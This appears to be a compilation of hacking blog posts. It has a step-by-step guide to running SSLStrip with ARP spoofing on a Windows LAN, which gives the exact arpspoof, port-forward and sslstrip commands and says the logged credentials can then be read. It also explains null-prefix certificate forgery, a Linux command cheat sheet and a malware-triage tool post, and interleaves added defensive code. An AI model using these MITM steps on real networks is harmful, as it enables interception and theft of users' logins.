Because we know it is easy to overwrite a function’s return address, an intelligent hacker might want to spawn a shell (with root permissions) by jumping the execution path to such code. But, what if there is no such code in the program to be exploited? The answer is to place the code we are trying to execute in the buffer’s overflowing area. We then overwrite the return address so it points back to the buffer and executes the intended code. Such code can be inserted into the program using environment variables or program input parameters.

I will be covering the shell program on the implementation of Buffer overflow attack in my next post.

Till then happy hacking.

SSL Hijacking

This article discusses the weakness in the SSL certificate signing request that gets exploited to make fake certificates. Finally, it shows how to run the SSLStrip tool on Windows and hijack SSL successfully.

What is SSLStrip
SSLStrip works by watching HTTP traffic, then acting as a proxy when a user attempts to initiate an HTTPS session. While the user believes the secure session has been initiated, and SSLStrip has connected to the secure server via HTTPS, all traffic between the user and SSLStrip is HTTP. SSLStrip replaces all https:// links in the page with http://. The warnings usually displayed by the browser don't appear and the session appears normal to the end user. Login details can then be harvested. The author of the tool, Moxie Marlinspike, says: "This tool provides a demonstration of the HTTPS stripping attacks that were presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, and then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial." An HTTPS padlock logo can be spoofed in the URL bar to further lull the user into a false sense of security. While SSL is generally accepted as being secure, security researchers have claimed SSL communications can be intercepted. Researcher Mike Perry said he had been in discussions with Google regarding an exploit he planned to release, which would allow a hacker to intercept a user's communications with supposedly secure websites over an unsecured Wi-Fi network.

Weakness of SSL in practice
The main weakness with conventional SSL certificates is that there are no standards for their issuance, nor any rules for what the fields in them are supposed to mean and which are required for authentication.

Marlinspike’s SSLStrip attack demonstrated the combination of several attack techniques to exploit the above weaknesses and fool users and client applications into thinking they were using a trusted site or server, when in fact they were using a fake version of it. He combined a number of techniques, including man-in-the-middle, fake leaf node certificates and the null character attack.

SSL relies heavily on the X.509 certificate structure to prove authenticity. For SSL it is the common name field of the X.509 certificate that is used to identify authentic servers. For example, PayPal will use www.paypal.com in the common name field. The signing process relies heavily on this convention: the Certificate Authorities will sign www.paypal.com, and they don’t care whether you are requesting anything.paypal.com or something.anything.paypal.com, as long as you prove that you are paypal.com.

X.509 certificates are formatted using ASN.1 notation. ASN.1 supports many string types, but all of them are represented as some variation of PASCAL (length-prefixed) strings. In a PASCAL string, NULL characters are treated as normal characters; they have no special meaning, so NULL characters can be included in the common name field of an X.509 certificate. A signing request for www.paypal.com\0.fakeorganization.com will therefore be treated as valid: the Certificate Authority ignores the prefix and signs for the root domain fakeorganization.com. Most contemporary SSL/TLS implementations, however, treat the field as a C string, and in C '\0' (NULL) marks the end of the string. So www.paypal.com\0.fakeorganization.com and www.paypal.com are treated as identical, and the owner of the certificate for www.paypal.com\0.fakeorganization.com can successfully present his certificate to connections intended for the real www.paypal.com. This is how a MITM happens on SSL.

You can also sign your own certificates using a valid certificate obtained from a Certificate Authority. There is a field in X.509 certificates that needs to be set to FALSE in order to restrict a domain owner from acting as a Certificate Authority. Most CAs did not explicitly set basicConstraints: CA=FALSE, and a lot of web browsers and other SSL implementations did not bother to check whether the field was there or not. Anyone with a valid leaf node certificate could therefore create and sign a leaf node certificate for any other domain: blueanarchy.org could create a valid certificate for paypal.com and use it.
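The null-prefix problem above comes down to how a client compares the certificate’s common name with the host it wanted to reach. The following Python is an added example, not code from this article or from SSLStrip: it places the flawed C-string style comparison next to a length-aware check that rejects any common name containing a NUL byte, and it also handles the one-label wildcard case, which goes beyond the article’s paypal.com example. The sample common names are constructed.

```python
import re

# Constructed sample common names (not from the article), as the raw bytes a
# client would pull out of the certificate. The second one has the embedded
# NUL shape described above.
SAMPLE_CNS = {
    "legitimate": b"www.paypal.com",
    "null_prefix": b"www.paypal.com\x00.fakeorganization.com",
    "wildcard": b"*.example.org",
}

_DNS_NAME = re.compile(r"(\*\.)?[a-z0-9-]+(\.[a-z0-9-]+)+")


def c_string_compare(cn: bytes, host: str) -> bool:
    """The flawed behaviour the article describes: the CN is treated as a C
    string, so everything after the first NUL byte is silently dropped before
    comparing with the requested host."""
    truncated = cn.split(b"\x00", 1)[0]
    return truncated.decode("ascii", "replace").lower() == host.lower()


def safe_cn_matches(cn: bytes, host: str) -> bool:
    """Length-aware match: a CN with an embedded NUL is rejected outright, the
    whole CN is compared, and only a leading '*.' label may act as a wildcard
    (matching exactly one label, never a parent domain)."""
    if b"\x00" in cn:
        return False  # an embedded NUL is never part of a valid DNS name
    try:
        name = cn.decode("ascii").lower()
    except UnicodeDecodeError:
        return False  # non-ASCII in a CN is not something to compare loosely
    host = host.lower().rstrip(".")
    if not _DNS_NAME.fullmatch(name):
        return False
    if name.startswith("*."):
        suffix = name[1:]                       # ".example.org"
        label, sep, rest = host.partition(".")  # "shop", ".", "example.org"
        return sep == "." and label != "" and "." + rest == suffix
    return name == host


if __name__ == "__main__":
    for label, cn in SAMPLE_CNS.items():
        print(label, cn,
              "c-string:", c_string_compare(cn, "www.paypal.com"),
              "safe:", safe_cn_matches(cn, "www.paypal.com"))
```

The point of the pair is that the constructed null-prefix name passes the C-string comparison for www.paypal.com but fails the safe one; the same safe check is what a client should apply to each subjectAltName entry as well, not just the common name.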

How SSLStrip works
• It does an MITM (Man-In-The-Middle) on the HTTP connection.
• It replaces all the HTTPS links with HTTP ones but remembers the links which were changed.
• It communicates with the victim client on an HTTP connection for any secure link.
• It communicates with the legitimate server over HTTPS for the same secure link.
• Communication is transparently proxied between the victim client and the legitimate server.
• Images such as the favicon are replaced by images of the familiar secure lock icon, to build trust.

As the MITM is taking place, all passwords, credentials etc. are stolen without the client knowing.
Performing the Hijack on Windows
The process of using SSLStrip on a Windows machine is almost the same as on a Linux machine. Linux has the firewall management tool iptables for enabling port forwarding. A port forwarding utility accepts traffic on one port of the machine and redirects it to another port on the same machine. Windows doesn’t have any inbuilt mechanism for port forwarding. There are mainly four steps to perform the experiment:
• Turn your machine into IP forwarding mode.
• Set up iptables to redirect HTTP traffic to sslstrip.
• Run sslstrip.
• Run arpspoof to convince a network they should send their traffic via your machine.
Prerequisite: Install Python, as SSLStrip is a Python based tool. You need two machines running Windows on the same LAN: one for the attacker, another for the victim. The attacker’s machine is the machine where SSLStrip runs. This is also the machine where you will run the arpspoof command to spoof the traffic from the victim machine. The port forwarding utility needs to be run on this machine as well.
Step 1: Enable IP forwarding on the attacker’s machine
Get the hacker machine to act as a router, as it needs to forward all the traffic coming to it to the outside internet.
• Start Registry Editor (Regedit.exe).
• In Registry Editor, locate the following registry key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
• Set the following registry value: Value Name: IPEnableRouter, Value type: REG_DWORD, Value Data: 1. A value of 1 enables TCP/IP forwarding for all network connections that are installed and used by this computer.
• Quit Registry Editor and restart the PC.
Step 2: Set a firewall rule that forwards HTTP traffic from the victim to the hacker’s machine for modification
This was the most challenging and time consuming part of the experiment, as I was unable to find a single command, tool or utility to do that. On Unix a single iptables command would do it:

sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

It tells the hacker’s machine to redirect all HTTP traffic from the victim arriving on port 80 to port 10000 on the same machine. Port 10000 is used by the SSLStrip tool by default. Tired of not finding any equivalent firewall utility for Windows to perform the above rule, I fortunately stumbled upon the blog of Kenneth Xu (http://kennethxu.blogspot.com) and finally found the following nice Java based TCP/IP port forwarding utility (download here: http://code.google.com/p/portforward/downloads/list):

C:\>java -classpath commons-logging.jar;portforward.jar org.enterprisepower.net.portforward.Forwarder 80 localhost:10000

This command forwards all HTTP traffic received on port 80 of the hacker’s machine to port 10000 of the same machine. SSLStrip runs on port 10000 by default.
Step 3: ARP spoof the target traffic to redirect it to the hacker’s machine
Suppose the victim machine’s IP is 192.168.1.10 and the IP of the gateway is 192.168.1.1. The attack poisons the victim machine’s (192.168.1.10) ARP table so that, instead of sending traffic to the gateway (192.168.1.1), it sends it to the hacker’s machine, falsely assuming it is the real gateway. Run the following command on the attacker’s machine:

arpspoof -t 192.168.1.10 192.168.1.1

It updates the ARP table on the victim’s machine so that the gateway IP now resolves to the attacker’s machine.
Step 4: Run SSLStrip on the hacker’s machine
Run the following command on the hacker’s machine:

python sslstrip.py -f lock.ico

You can see the log file in the SSLStrip installation folder for logged credentials. SSLStrip will log all the traffic coming from the victim’s machine and strip all the SSL links (https://) to http:// between the victim and the hacker. Thus the traffic between the victim and the hacker is transparent and in clear text. Various options are available with SSLStrip:
Options:
• -w <filename>, --write=<filename>  Specify file to log to (optional)
• -p, --post  Log only SSL POSTs (default)
• -s, --ssl  Log all SSL traffic to and from server
• -a, --all  Log all SSL and HTTP traffic to and from server
• -l <port>, --listen=<port>  Port to listen on (default 10000)
• -f, --favicon  Substitute a lock favicon
• -k, --killsessions  Kill sessions in progress
• -h  Print this help message

Real life examples
The following page appears on https:// in a normal situation, but here it is served as http://. Viewing the page source also reveals that the links are stripped of SSL. (Screenshots: Gmail served over http, and an example SSLStrip log file.)
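Viewing the page source is the check the article recommends. The following Python is an added example, not part of the article or of SSLStrip, that automates it from the defender’s side: it parses a saved HTML page and reports links, form actions and favicon references that arrive as plain http:// for hosts that should only ever be reached over HTTPS, and separately flags any password field inside a form that would post over http. The sample page and host names are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page (not a real capture): the sign-in link, the login
# form and the favicon arrive as plain http://, which is the symptom described
# above; the help link survived as https.
SAMPLE_HTML = """
<html><body>
<a href="http://mail.example.com/login">Sign in</a>
<a href="https://mail.example.com/help">Help</a>
<a href="http://static.example.com/logo.png">logo</a>
<form action="http://accounts.example.com/ServiceLogin" method="post">
  <input type="text" name="Email">
  <input type="password" name="Passwd">
</form>
<link rel="shortcut icon" href="http://mail.example.com/favicon.ico">
</body></html>
"""


class _RefCollector(HTMLParser):
    """Collect every href/action/src, and note password fields whose
    enclosing form would submit over plain http."""

    def __init__(self):
        super().__init__()
        self.refs = []                    # (tag, attribute, url)
        self.insecure_password_forms = []  # form actions carrying a password
        self._form_action = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        for attr in ("href", "action", "src"):
            if a.get(attr):
                self.refs.append((tag, attr, a[attr]))
        if tag == "form":
            self._form_action = a.get("action")
        elif tag == "input" and a.get("type", "").lower() == "password":
            if self._form_action and urlsplit(self._form_action).scheme == "http":
                self.insecure_password_forms.append(self._form_action)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form_action = None


def audit_page(html, sensitive_hosts):
    """Return the http:// references to hosts that should be HTTPS-only, plus
    any forms that would send a password over http."""
    p = _RefCollector()
    p.feed(html)
    p.close()
    stripped = []
    for tag, attr, url in p.refs:
        parts = urlsplit(url)
        if parts.scheme == "http" and parts.hostname in sensitive_hosts:
            stripped.append((tag, attr, url))
    return {"stripped_links": stripped,
            "password_forms_over_http": p.insecure_password_forms}


if __name__ == "__main__":
    report = audit_page(SAMPLE_HTML, {"mail.example.com", "accounts.example.com"})
    for tag, attr, url in report["stripped_links"]:
        print(f"http reference in <{tag} {attr}>: {url}")
    for action in report["password_forms_over_http"]:
        print(f"password form posting over http: {action}")
```

Save the page as the browser received it (not after any client-side rewriting) and pass the set of hosts you know serve only HTTPS; any hit is worth investigating, and a password form over http is the one that matters most.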

Mitigation
User education: Users should be educated to always use https while requesting any sensitive page. A user who only types domain.com and relies on being redirected to https://domain.com may be vulnerable to SSLStrip.
EV SSL certificates: There is no reliable information to back up the authentication of the domain name. To address this critical problem, certificate authorities and software companies joined to form the CA/Browser Forum and promulgate a new standard called EV SSL, for Extended Validation SSL. For instance, they must validate that the organization exists as a legal entity, that any organization names are legal names for that organization, and that the applicant is authorized to apply for the certificate.
SSLStrip tool:

http://www.thoughtcrime.org/software/sslstrip/

NULL Prefix attack on SSL Certificates:

http://www.thoughtcrime.org/papers/null-prefix-attacks.pdf

Black Hat presentation:

http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

(Topic is same as read in Hacking magazine June 2010 issue)

Starting & Stopping

shutdown -h now  Shut down the system now and do not reboot
halt  Stop all processes – same as above
shutdown -r 5  Shut down the system in 5 minutes and reboot
shutdown -r now  Shut down the system now and reboot
reboot  Stop all processes and then reboot – same as above
startx  Start the X system

Accessing & mounting file systems

mount -t iso9660 /dev/cdrom /mnt/cdrom  Mount the device cdrom and call it cdrom under the /mnt directory
mount -t msdos /dev/hdd /mnt/ddrive  Mount hard disk “d” as an MS-DOS file system and call it ddrive under the /mnt directory
mount -t vfat /dev/hda1 /mnt/cdrive  Mount the first partition of hard disk “a” as a VFAT file system and call it cdrive under the /mnt directory
umount /mnt/cdrom  Unmount the cdrom

Finding files and text within files

find / -name fname  Starting with the root directory, look for the file called fname
find / -name "*fname*"  Starting with the root directory, look for files whose name contains the string fname
locate missingfilename  Find a file called missingfilename using the locate command – this assumes you have already run the command updatedb
updatedb  Create or update the database of files on all file systems attached to the Linux root directory
which missingfilename  Show the directory containing the executable file called missingfilename
grep -r textstringtofind /dir  Starting with the directory called dir, look for and list all files containing textstringtofind

The X Window System


xvidtune Run the X graphics tuning utility
XF86Setup Run the X configuration menu with automatic probing of graphics cards
Xconfigurator Run another X configuration menu with automatic probing of graphics cards
xf86config Run a text based X configuration menu

Moving, copying, deleting & viewing files

ls -l  List files in the current directory using long format
ls -F  List files in the current directory and indicate the file type
ls -laC  List all files in the current directory in long format and display in columns
rm name  Remove a file or directory called name
rm -rf name  Remove an entire directory called name, including all of its files and subdirectories
cp filename /home/dirname  Copy the file called filename to the /home/dirname directory
mv filename /home/dirname  Move the file called filename to the /home/dirname directory
cat filetoview  Display the file called filetoview
man -k keyword  Display man pages containing keyword
more filetoview  Display the file called filetoview one page at a time; proceed to the next page using the spacebar
head filetoview  Display the first 10 lines of the file called filetoview
head -20 filetoview  Display the first 20 lines of the file called filetoview
tail filetoview  Display the last 10 lines of the file called filetoview
tail -20 filetoview  Display the last 20 lines of the file called filetoview

Installing software

rpm -ihv name.rpm  Install the rpm package called name
rpm -Uhv name.rpm  Upgrade the rpm package called name
rpm -e package  Delete the rpm package called package
rpm -ql package  List the files in the installed package called package
rpm -qi package  Display information about the installed package called package, including its version
rpm -i --force name.rpm  Reinstall the rpm package called name having deleted parts of it (not deleted using rpm -e)
tar -zxvf archive.tar.gz or tar -zxvf archive.tgz  Decompress the files contained in the zipped and tarred archive called archive
./configure  Execute the script preparing the unpacked files for compiling

User Administration

adduser accountname  Create a new user called accountname
passwd accountname  Give accountname a new password
su  Log in as superuser from the current login
exit  Stop being superuser and revert to the normal user

X Shortcuts – (mainly for Redhat)

Control|Alt + or -  Increase or decrease the screen resolution, e.g. from 640×480 to 800×600
Alt|Escape  Display the list of active windows
Shift|Control F8  Resize the selected window
Right click on desktop background  Display menu
Shift|Control|Alt r  Refresh the screen
Shift|Control|Alt x  Start an xterm session
Printing

/etc/rc.d/init.d/lpd start Start the print daemon
/etc/rc.d/init.d/lpd stop Stop the print daemon
/etc/rc.d/init.d/lpd status Display status of the print daemon
lpq Display jobs in print queue
lprm Remove jobs from queue
lpr Print a file
lpc Printer control tool
man subject | lpr Print the manual page called subject as plain text
man -t subject | lpr Print the manual page called subject as Postscript output
printtool Start X printer setup interface

Some More

ifconfig
List ip addresses for all devices on the machine
apropos subject List manual pages for subject
usermount Executes graphical application for mounting and unmounting file systems

Thursday, July 7, 2011

Incident Analyser: A Remote Malware Outbreak Analyser

This is the second submission received via the PenTestIT Submit Your Tool page. It is a submission by Mr. Beenu Arora, who had previously submitted the Malware Analyser. Back to this tool: Incident Analyser is a freeware tool for responding to a malware outbreak in an environment. The tool can be helpful in identifying the infected/suspected hosts in a large network.



The tool can perform the following tasks on list of IPs on a network:
Dumping list of active connections of a node.
Fetching list of network interfaces.
Dumping information of the running processes.
Fetching start-up items list along with actual files path.

Using this tool is very simple. It takes just one argument. Just see to it that you have the proper privileges and authorization credentials to do so.

IAnalyser
Download Incident Analyser v1.0 (Ianalyser.zip) here.
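As an added example, not code from Incident Analyser or its author, the following Python shows what a responder does with the kind of per-host dump the tool collects: it parses Windows netstat -ano and tasklist /fo csv output, joins each connection to its owning process by PID, and flags hosts that have connections to an indicator list or to an assumed-suspicious port. The sample output, the indicator address and the port list are constructed.

```python
import csv
import io

# Constructed sample dumps (not real captures), in the shape of Windows
# `netstat -ano` and `tasklist /fo csv` output as collected from one host.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.10:49155     203.0.113.7:6667       ESTABLISHED     1844
  TCP    192.168.1.10:49160     198.51.100.20:443      ESTABLISHED     2512
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  UDP    0.0.0.0:5355           *:*                                    1112
"""
TASKLIST_SAMPLE = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"svchost.exe","880","Services","0","8,120 K"
"svchost.exe","1112","Services","0","6,004 K"
"updater.exe","1844","Console","1","3,412 K"
"firefox.exe","2512","Console","1","120,512 K"
"""

# Assumed-suspicious remote ports for this example (constructed choice).
SUSPICIOUS_PORTS = frozenset({6667})


def parse_netstat(text):
    """Turn `netstat -ano` text into connection dicts; header lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4 or parts[0] not in ("TCP", "UDP"):
            continue
        if parts[0] == "TCP":
            if len(parts) < 5:
                continue
            proto, local, remote, state, pid = parts[:5]
        else:                      # UDP lines carry no state column
            proto, local, remote, pid = parts[:4]
            state = ""
        rhost, _, rport = remote.rpartition(":")
        rows.append({"proto": proto, "local": local, "remote_host": rhost,
                     "remote_port": rport, "state": state, "pid": int(pid)})
    return rows


def parse_tasklist(text):
    """Map PID -> image name from `tasklist /fo csv` output."""
    return {int(r["PID"]): r["Image Name"] for r in csv.DictReader(io.StringIO(text))}


def triage_host(netstat_text, tasklist_text, bad_remotes, bad_ports=SUSPICIOUS_PORTS):
    """Join connections to their process and return the findings a responder
    looks at first: traffic to indicator hosts, or established sessions to
    ports that should not be in use, each with the owning process name."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for c in parse_netstat(netstat_text):
        reason = None
        if c["remote_host"] in bad_remotes:
            reason = "remote host on indicator list"
        elif (c["proto"] == "TCP" and c["state"] == "ESTABLISHED"
              and c["remote_port"].isdigit() and int(c["remote_port"]) in bad_ports):
            reason = f"established to suspicious port {c['remote_port']}"
        if reason:
            findings.append({**c, "process": procs.get(c["pid"], "<unknown>"),
                             "reason": reason})
    return findings


def triage_fleet(dumps, bad_remotes):
    """dumps: {hostname: (netstat_text, tasklist_text)}. Returns the sorted
    hostnames with at least one finding, i.e. the suspected hosts to look at first."""
    return sorted(h for h, (n, t) in dumps.items() if triage_host(n, t, bad_remotes))


if __name__ == "__main__":
    for f in triage_host(NETSTAT_SAMPLE, TASKLIST_SAMPLE, {"203.0.113.7"}):
        print(f"{f['process']} (pid {f['pid']}) -> {f['remote_host']}:{f['remote_port']}: {f['reason']}")
```

Feed it the raw netstat and tasklist text collected from each host and a set of remote addresses from the current incident; the join on PID is what turns a bare connection into something actionable, since the process name tells you what to pull next (its binary, its start-up entry, its parent).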